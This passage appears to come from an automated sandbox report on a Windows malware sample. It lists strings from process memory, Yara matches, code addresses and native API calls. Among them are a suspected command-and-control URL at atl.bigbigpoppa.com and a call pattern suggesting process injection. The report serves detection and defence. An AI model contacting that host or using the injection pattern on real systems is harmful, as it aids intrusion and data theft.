Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P |
Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmp | String found in binary or memory: http://atl.bigbigpoppa.com/t |
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m5 |
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmp | String found in binary or memory: http://www.microsoft.co |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR |
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR |
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E5725F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E57E30 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E51754 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05593570 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05575C88 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055710E6 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055790A1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05587B5D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05584B1F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055843B9 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557FBA9 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557423D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558DAED |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055952A0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EE95C |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FB948 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FB230 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F06B4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F6EA0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E6684 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D76F4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F5ED8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EC6C4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E2EC0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F2EF8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E559C |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E1DF4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F4DE0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E5DBC |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D3610 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D74A4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E4484 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E9500 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D4B60 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F4354 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D1348 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E8340 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3FA3A4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F4BA0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3DABDC |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F9408 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F3400 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EBA74 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D9AD8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3ED328 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F730C |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F5164 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E1164 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E4150 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D0000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D2138 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EA9F8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E70C8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3F88B8 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E0124 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D90FC |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F404796 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EF7B4 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3EA790 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3E7820 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 31_2_000002174F3D1000 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DB948 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CE95C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DB230 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D3400 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B1000 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C7820 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D88B8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C70C8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B90FC |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C0124 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B2138 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C6944 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C4150 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C1164 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D5164 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CA9F8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CBA74 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B9AD8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D730C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CD328 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B1348 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C8340 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D4354 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B4B60 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000DA3A4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D4BA0 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000BABDC |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D9408 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C4484 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B74A4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C9500 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C559C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C5DBC |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D4DE0 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C1DF4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B3610 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C6684 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D6EA0 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D06B4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CC6C4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000C2EC0 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D5ED8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000D2EF8 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000B76F4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CA790 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_000CF7B4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ADB948 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ADB230 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ADA3A4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD4BA0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACF7B4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACA790 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ABABDC |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACD328 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD2EF8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD730C |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB4B60 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC8340 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD4354 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB1348 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB74A4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC4484 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD88B8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC70C8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC7820 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB1000 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD3400 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD9408 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC559C |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD4DE0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC1DF4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC5DBC |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC0124 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC9500 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB90FC |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD5164 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC1164 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACE95C |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC6944 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB2138 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC4150 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD6EA0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD06B4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC6684 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB9AD8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AD5ED8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB76F4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACC6C4 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AC2EC0 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACA9F8 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AB3610 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8ACBA74 |
Source: C:\Windows\System32\rundll32.exe | Code function: 40_2_00000195D8AEF5CC |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E540DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E56EB3 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E57666 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E58055 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055737F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558F7F5 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0559079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05586657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055909D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558B878 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05585878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558A8F7 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05588890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05579D36 NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_055855D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0557579C NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05580FBD memset,NtQueryInformationProcess, |
